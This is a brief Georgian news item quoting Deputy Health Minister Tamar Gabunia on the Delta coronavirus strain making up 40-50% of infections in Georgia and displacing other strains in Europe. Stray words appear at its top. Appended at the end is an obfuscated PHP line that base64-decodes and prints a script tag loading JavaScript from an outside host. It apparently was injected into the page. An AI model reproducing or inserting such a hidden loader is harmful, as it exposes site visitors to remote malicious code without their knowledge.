celsiusi
ავერსი საქკაბელი
ჯანდაცვის მინისტრის მოადგილის, თამარ გაბუნიას განცხადებით, ქვეყანაში კორონავირუსით ინფიცირებულთა 40-50%-ს „დელტა“ შტამი აქვს.
 
როგორც გაბუნია განმარტავს, მსგავსი ტენდენცია მსოფლიო მასშტაბითაა და ევროპის ქვეყნებში დელტა შტამი ფაქტობრივად, სხვა ყველა შტამს ანაცვლებს.
 
„თუ აქამდე ვსაუბრობდით, რომ დელტა შტამი დაახლოებით, 20%-ში ცირკულირებდა, ახლა ეს უკვე იზრდება და სავარაუდოდ, 40-50%-იც კი შესაძლოა იყოს დელტა შტამის გავრცელების მაჩვენებელი. ევროპის ქვეყნებში თითქმის უახლოვდება იმ მდგომარეობას, რომ დელტა შტამი ყველა სხვა შტამს ანაცვლებს, ასე რომ, ტენდენციები ჩვენთანაც მსგავსია“, - განაცხადა გაბუნიამ.
921
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");